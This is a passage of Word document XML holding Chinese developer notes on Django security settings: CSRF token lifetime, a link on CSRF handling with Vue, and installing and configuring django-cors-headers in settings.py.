        <w:t>一般情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌在用户登录后会一直有效，直到用户注销或其会话失效。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌并不是一次性的，而是绑定到用户会话的，因此在用户保持登录状态的情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌是有效的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07A8C7" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E2AA2B" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，在某些情况下，可能需要重新生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌，比如在用户身份验证状态发生变化（例如用户登录或注销）时，或者在用户特权级别发生变化时。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常会在用户登录、注销、修改密码等敏感操作时重新生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A6FF3A" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7695F11E" w14:textId="4C9A121C" w:rsidR="00E51881" w:rsidRPr="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总体而言，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌的有效性并不是一次性的，而是与用户的会话状态相关。用户在登录状态下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌会保持有效，直到用户注销或会话失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D0E2B" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62316021" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412A7888" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1553C74B" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6D5D93" w14:textId="4FC4D1F0" w:rsidR="00311021" w:rsidRDefault="00311021" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="652" w:name="_Toc159780082"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前后端分离如何解决</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="652"/>
    </w:p>
    <w:p w14:paraId="0C46B4E4" w14:textId="5D0CA21E" w:rsidR="00311021" w:rsidRDefault="00C57CAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId170" w:history="1">
        <w:r w:rsidRPr="005C7DAB">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://zhuanlan.zhihu.com/p/655052033</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EB3DCCA" w14:textId="77777777" w:rsidR="006E53CB" w:rsidRDefault="006E53CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659382B1" w14:textId="77777777" w:rsidR="006E53CB" w:rsidRDefault="006E53CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A257DD0" w14:textId="1D0654CD" w:rsidR="006E53CB" w:rsidRDefault="006E53CB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="653" w:name="_Toc159780083"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨域</w:t>
      </w:r>
      <w:r w:rsidRPr="006E53CB">
        <w:t>corsheaders</w:t>
      </w:r>
      <w:bookmarkEnd w:id="653"/>
    </w:p>
    <w:p w14:paraId="033A9AD9" w14:textId="77777777" w:rsidR="00FA1CC8" w:rsidRDefault="00FA1CC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659BD293" w14:textId="48490414" w:rsidR="00FA1CC8" w:rsidRPr="00FA1CC8" w:rsidRDefault="00FA1CC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>本质上，我设定了固有的几个域名，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或者域名，浏览器跨域访问我的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>携带他自己的实际请求的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，会被我此处的设置卡，从而达到避免非授权跨域的危险操作。能够屏蔽第三方网站的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>攻击问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2846C49F" w14:textId="77777777" w:rsidR="00FA1CC8" w:rsidRPr="00FA1CC8" w:rsidRDefault="00FA1CC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A046BDB" w14:textId="09B14407" w:rsidR="006E53CB" w:rsidRDefault="006E53CB" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E53CB">
        <w:lastRenderedPageBreak/>
        <w:t>pip install django-cors-headers</w:t>
      </w:r>
      <w:r>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="006E53CB">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D61B2" w14:textId="76AA98B5" w:rsidR="006E53CB" w:rsidRPr="006E53CB" w:rsidRDefault="006E53CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BA7DCD" w14:textId="28636CE7" w:rsidR="00C57CAD" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:t>s.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B06FC0" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FD5004" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>INSTALLED_APPS = [</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'user'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>由于涉及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>auth.User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的更改，需要放置在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模块前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># 'csp',   # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>限制发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>csp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，以便</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可控制浏览器监听鼠标事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.admin'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.auth'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.contenttypes'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.sessions'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.messages'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.staticfiles'</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>支持跨域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'corsheaders'</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># DRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'rest_framework'</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2A502" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5888C0F4" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CF1C54" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MIDDLEWARE = [</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>跨域设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'corsheaders.middleware.CorsMiddleware'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399EB9CB" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FE14D2" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF9AB85" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
